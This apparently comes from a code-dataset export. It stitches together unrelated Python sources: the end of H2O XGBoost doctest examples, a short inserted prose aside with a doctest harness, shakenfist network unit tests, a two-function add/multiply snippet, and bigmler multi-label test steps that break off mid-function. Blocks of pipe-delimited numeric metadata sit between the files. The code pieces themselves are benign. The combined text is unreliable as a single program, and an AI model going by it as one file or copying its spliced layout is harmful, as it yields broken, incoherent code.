>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(max_leaves=0, seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
min_sum_hessian_in_leaf="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_sum_hessian_in_leaf=90.5,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
min_data_in_leaf="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(min_data_in_leaf=0.55,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
sample_type="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"]= airlines["Year"].asfactor()
>>> airlines["Month"]= airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(sample_type="weighted",
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
normalize_type="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... normalize_type="tree",
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
rate_drop="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(rate_drop=0.1, seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
one_drop="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> del predictors[1:3]
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... one_drop=True,
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
skip_drop="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(skip_drop=0.5,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train)
>>> airlines_xgb.auc(train=True)
""",
tree_method="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8],
... seed=1234)
>>> airlines_xgb = H2OXGBoostEstimator(seed=1234,
... tree_method="approx")
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
grow_policy="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> titanic["const_1"] = 6
>>> titanic["const_2"] = 7
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(seed=1234,
... grow_policy="depthwise")
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> titanic_xgb.auc(valid=True)
""",
booster="""
>>> titanic = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv")
>>> titanic['survived'] = titanic['survived'].asfactor()
>>> predictors = titanic.columns
>>> response = 'survived'
>>> train, valid = titanic.split_frame(ratios=[.8],
... seed=1234)
>>> titanic_xgb = H2OXGBoostEstimator(booster='dart',
... normalize_type="tree",
... seed=1234)
>>> titanic_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(titanic_xgb.auc(valid=True))
""",
reg_lambda="""
>>> airlines= h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/airlines/allyears2k_headers.zip")
>>> airlines["Year"] = airlines["Year"].asfactor()
>>> airlines["Month"] = airlines["Month"].asfactor()
>>> airlines["DayOfWeek"] = airlines["DayOfWeek"].asfactor()
>>> airlines["Cancelled"] = airlines["Cancelled"].asfactor()
>>> airlines['FlightNum'] = airlines['FlightNum'].asfactor()
>>> predictors = ["Origin", "Dest", "Year", "UniqueCarrier",
... "DayOfWeek", "Month", "Distance", "FlightNum"]
>>> response = "IsDepDelayed"
>>> train, valid= airlines.split_frame(ratios=[.8])
>>> airlines_xgb = H2OXGBoostEstimator(reg_lambda=.0001,
... seed=1234)
>>> airlines_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(airlines_xgb.auc(valid=True))
""",
reg_alpha="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(reg_alpha=.25)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> print(boston_xgb.mse(valid=True))
""",
dmatrix_type="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(dmatrix_type="auto",
... seed=1234)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> boston_xgb.mse()
""",
gpu_id="""
>>> boston = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/BostonHousing.csv")
>>> predictors = boston.columns[:-1]
>>> response = "medv"
>>> boston['chas'] = boston['chas'].asfactor()
>>> train, valid = boston.split_frame(ratios=[.8])
>>> boston_xgb = H2OXGBoostEstimator(gpu_id=0,
... seed=1234)
>>> boston_xgb.train(x=predictors,
... y=response,
... training_frame=train,
... validation_frame=valid)
>>> boston_xgb.mse()
""",
backend="""
>>> pros = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv")
>>> pros["CAPSULE"] = pros["CAPSULE"].asfactor()
>>> pros_xgb = H2OXGBoostEstimator(tree_method="exact",
... seed=123,
... backend="cpu")
>>> pros_xgb.train(y="CAPSULE",
... ignored_columns=["ID"],
... training_frame=pros)
>>> pros_xgb.auc()
"""
)
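The parameter examples above are stored as doctest-style strings keyed by parameter name. A minimal sketch, assuming a dict named `examples` like the one closed above and an already-initialized h2o cluster (h2o.init() called, H2OXGBoostEstimator importable), of how such snippets could be smoke-tested with the standard doctest module:

import doctest

def run_examples(examples):
    # Hypothetical harness: execute each parameter's ">>> ..." snippet
    # as a doctest and count how many examples fail.
    parser = doctest.DocTestParser()
    failures = 0
    for param, snippet in examples.items():
        test = parser.get_doctest(snippet, globs=globals(),
                                  name=param, filename=param, lineno=0)
        runner = doctest.DocTestRunner(verbose=False)
        runner.run(test)
        failures += runner.failures
    return failures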
| 45.150476
| 149
| 0.578784
| 4,664
| 47,408
| 5.730274
| 0.063679
| 0.03143
| 0.028699
| 0.037529
| 0.868592
| 0.859238
| 0.856282
| 0.848051
| 0.84603
| 0.844159
| 0
| 0.027474
| 0.235319
| 47,408
| 1,049
| 150
| 45.193518
| 0.709754
| 0.011137
| 0
| 0.782524
| 0
| 0.057282
| 0.959323
| 0.338007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001942
| false
| 0
| 0.061165
| 0
| 0.065049
| 0.033981
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1323d0da589721f2ebae3243e0df15be7eec9c87
| 11,416
|
py
|
Python
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 24
|
2020-07-20T23:47:52.000Z
|
2022-02-10T05:12:01.000Z
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 637
|
2020-06-19T06:57:30.000Z
|
2022-03-31T08:58:54.000Z
|
shakenfist/tests/test_net.py
|
mandoonandy/shakenfist
|
b96ebaf2e304233cc3bab7131895ef6ba685289b
|
[
"Apache-2.0"
] | 7
|
2020-07-14T20:48:40.000Z
|
2021-12-18T10:06:51.000Z
|
import mock
import testtools
from shakenfist.baseobject import DatabaseBackedObject as dbo
from shakenfist import exceptions
from shakenfist import net
from shakenfist.config import SFConfig
from shakenfist.tests import base
class NetworkTestCase(base.ShakenFistTestCase):
def setUp(self):
super(NetworkTestCase, self).setUp()
self.ipmanager_get = mock.patch(
'shakenfist.ipmanager.IPManager.from_db')
self.mock_ipmanager_get = self.ipmanager_get.start()
self.addCleanup(self.ipmanager_get.stop)
self.ipmanager_persist = mock.patch(
'shakenfist.db.persist_ipmanager')
self.mock_ipmanager_persist = self.ipmanager_persist.start()
self.addCleanup(self.ipmanager_persist.stop)
self.etcd_client = mock.patch('etcd3.client')
self.mock_etcd_client = self.etcd_client.start()
self.addCleanup(self.etcd_client.stop)
self.etcd_lock = mock.patch('shakenfist.etcd.ActualLock')
self.mock_etcd_lock = self.etcd_lock.start()
self.addCleanup(self.etcd_lock.stop)
class NetworkGeneralTestCase(NetworkTestCase):
def test_init(self):
net.Network({
'uuid': 'notauuid',
'vxid': 2,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
def test_str(self):
n = net.Network({
'uuid': 'notauuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertEqual('network(notauuid)', str(n))
class NetworkNormalNodeTestCase(NetworkTestCase):
def setUp(self):
super(NetworkNormalNodeTestCase, self).setUp()
fake_config = SFConfig(NODE_EGRESS_IP='1.1.1.2',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2')
self.config = mock.patch('shakenfist.net.config', fake_config)
self.mock_config = self.config.start()
self.addCleanup(self.config.stop)
#
# is_okay()
#
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_yes(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=False)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_not_created(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
@mock.patch('shakenfist.net.config', SFConfig(NODE_EGRESS_IP='1.1.1.1',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2',
NODE_IS_NETWORK_NODE=True))
def test_is_okay_no_dns(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
class NetworkNetNodeTestCase(NetworkTestCase):
def setUp(self):
super(NetworkNetNodeTestCase, self).setUp()
fake_config = SFConfig(NODE_EGRESS_IP='1.1.1.2',
NODE_MESH_IP='1.1.1.2',
NETWORK_NODE_IP='1.1.1.2',
NODE_IS_NETWORK_NODE=True)
self.config = mock.patch('shakenfist.net.config', fake_config)
self.mock_config = self.config.start()
self.addCleanup(self.config.stop)
#
# is_okay()
#
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_yes(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=False)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=True)
def test_is_okay_not_created(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
def test_is_okay_no_masq(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': False,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_okay())
@mock.patch('shakenfist.net.Network.is_created', return_value=True)
@mock.patch('shakenfist.net.Network.is_dnsmasq_running', return_value=False)
def test_is_okay_no_masq_no_dhcp(self, mock_is_dnsmasq, mock_is_created):
n = net.Network({
'uuid': 'actualuuid',
'vxid': 42,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': False,
'provide_nat': False,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_okay())
#
# is_created()
#
@mock.patch('shakenfist.util.process.execute',
return_value=(
"""[ {},{
"ifindex": 1,
"ifname": "br-vxlan-5",
"flags": [ "BROADCAST","MULTICAST","UP","LOWER_UP" ],
"mtu": 1500,
"qdisc": "noqueue",
"operstate": "UP",
"group": "default",
"txqlen": 1000,
"link_type": "ether",
"address": "1a:46:97:a1:c2:3a",
"broadcast": "ff:ff:ff:ff:ff:ff"
},{},{},{} ]""", ''))
def test_is_created_yes(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertTrue(n.is_created())
@mock.patch('shakenfist.util.process.execute',
return_value=("""[ {},{
"ifindex": 1,
"ifname": "br-vxlan-5",
"flags": [ "BROADCAST","MULTICAST","DOWN","LOWER_UP" ],
"mtu": 1500,
"qdisc": "noqueue",
"operstate": "UP",
"group": "default",
"txqlen": 1000,
"link_type": "ether",
"address": "1a:46:97:a1:c2:3a",
"broadcast": "ff:ff:ff:ff:ff:ff"
},{},{},{} ]""", ''))
def test_is_created_no(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 1,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_created())
@mock.patch('shakenfist.util.process.execute',
return_value=('', "Device 'br-vxlan-45' does not exist."))
def test_is_created_no_bridge(self, mock_execute):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
self.assertFalse(n.is_created())
@mock.patch('shakenfist.db.get_lock')
@mock.patch('shakenfist.net.Network._db_get_attribute',
side_effect=[
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_CREATED, 'update_time': 0},
{'value': dbo.STATE_ERROR, 'update_time': 0},
{'value': dbo.STATE_DELETED, 'update_time': 0},
{'value': dbo.STATE_DELETED, 'update_time': 0},
])
@mock.patch('shakenfist.net.Network._db_set_attribute')
@mock.patch('shakenfist.etcd.put')
def test_set_state_valid(
self, mock_put, mock_attribute_set, mock_state_get, mock_lock):
n = net.Network({
'uuid': '8abbc9a6-d923-4441-b498-4f8e3c166804',
'vxid': 5,
'name': 'bobnet',
'namespace': 'finitespace',
'provide_dhcp': True,
'provide_nat': True,
'egress_nic': 'eth0',
'mesh_nic': 'eth0',
'netblock': '192.168.1.0/24'
})
with testtools.ExpectedException(exceptions.InvalidStateException):
n.state = net.Network.STATE_INITIAL
n.state = dbo.STATE_ERROR
n.state = dbo.STATE_DELETED
with testtools.ExpectedException(exceptions.InvalidStateException):
n.state = dbo.STATE_CREATED
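Each setUp above starts a mock.patch patcher by hand and registers its stop with addCleanup, so the patch stays active across the whole test and is reliably undone even on failure. A minimal, self-contained sketch of that idiom using only the standard library (the patched target here, os.getcwd, is illustrative and not taken from the tests above):

import os
import unittest
from unittest import mock

class PatcherIdiomExample(unittest.TestCase):
    def setUp(self):
        super(PatcherIdiomExample, self).setUp()
        # Start the patcher manually so the mock is live for every test
        # method, and register stop() so it runs even if a test fails.
        self.getcwd_patcher = mock.patch('os.getcwd', return_value='/tmp')
        self.mock_getcwd = self.getcwd_patcher.start()
        self.addCleanup(self.getcwd_patcher.stop)

    def test_patch_is_active(self):
        # The mock is in effect without any decorator on the test itself.
        self.assertEqual('/tmp', os.getcwd())

if __name__ == '__main__':
    unittest.main()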
| 36.012618
| 80
| 0.542835
| 1,233
| 11,416
| 4.811841
| 0.117599
| 0.050565
| 0.086466
| 0.070453
| 0.809034
| 0.764369
| 0.753919
| 0.727625
| 0.722737
| 0.722737
| 0
| 0.043957
| 0.308514
| 11,416
| 316
| 81
| 36.126582
| 0.707626
| 0.002891
| 0
| 0.720149
| 0
| 0
| 0.286949
| 0.096105
| 0
| 0
| 0
| 0
| 0.041045
| 1
| 0.059701
| false
| 0
| 0.026119
| 0
| 0.100746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
133aeae93151413157245283ef01c5da29120a33
| 102
|
py
|
Python
|
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
pranavmodx/aiida-core
|
0edbbf82dfb97ab130914d1674a6f2217eba5971
|
[
"BSD-2-Clause",
"MIT"
] | 1
|
2019-07-31T04:08:13.000Z
|
2019-07-31T04:08:13.000Z
|
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
odarbelaeze/aiida_core
|
934b4ccdc73a993f2a6656caf516500470e3da08
|
[
"BSD-2-Clause"
] | null | null | null |
docs/source/concepts/include/snippets/calculations/calcfunctions/add_multiply_plain_python.py
|
odarbelaeze/aiida_core
|
934b4ccdc73a993f2a6656caf516500470e3da08
|
[
"BSD-2-Clause"
] | null | null | null |
def add(x, y):
return x + y
def multiply(x, y):
return x * y
result = multiply(add(1, 2), 3)
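For reference, the composed call above evaluates add(1, 2) to 3 and then multiply(3, 3) to 9; a quick sanity check (not part of the original snippet):

assert result == 9  # add(1, 2) == 3, then multiply(3, 3) == 9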
| 14.571429
| 31
| 0.558824
| 20
| 102
| 2.85
| 0.5
| 0.140351
| 0.280702
| 0.315789
| 0.350877
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 0.27451
| 102
| 7
| 31
| 14.571429
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.4
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1367e315e4c1d588da88c6cb8f2d19fb8f52a76e
| 14,420
|
py
|
Python
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 32
|
2015-01-12T10:11:42.000Z
|
2021-11-14T19:45:14.000Z
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 42
|
2015-02-12T09:54:11.000Z
|
2022-03-31T11:33:39.000Z
|
bigmler/tests/ml_tst_prediction_steps.py
|
bigmlcom/bigmler
|
91973ca1e752954302bf26bb22aa6874dc34ce69
|
[
"Apache-2.0"
] | 23
|
2015-03-04T13:25:23.000Z
|
2020-07-15T18:25:52.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright 2014-2021 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import time
import csv
import json
from bigmler.tests.world import world, res_filename
from subprocess import check_call, CalledProcessError
from bigmler.checkpoint import file_number_of_lines
from bigmler.tests.common_steps import check_debug
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator and "(.*)" as multi-label fields using model_fields "(.*)" and objective "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_create_all_mlm_resources(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, ml_fields=None, model_fields=None, objective=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None or model_fields is None or objective is None or ml_fields is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --multi-label-fields " + ml_fields +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --model-fields \" " + model_fields +
"\" --test " + test + " --store --output " + output +
" --objective " + objective +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator to test "(.*)" and log predictions in "(.*)"')
def i_create_all_ml_resources(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --test " + test + " --store --output " + output +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag(step, tag=None, test=None, output=None):
if tag is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --test " +
test + " --store --output " + output +
" --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources with labels "(.*)" and objective "(.*)" using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag_with_labels_with_objective(step, labels=None, objective=None, tag=None, test=None, output=None):
if (tag is None or labels is None or test is None or output is None
or objective is None):
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --labels " +
labels + " --test " + test + " --store --output " + output +
" --objective " + objective + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources with labels "([^"]*)" using models tagged as "(.*)" to test "(.*)" and log predictions in "(.*)"')
def i_predict_ml_from_model_tag_with_labels(step, labels=None, tag=None, test=None, output=None):
if tag is None or labels is None or test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
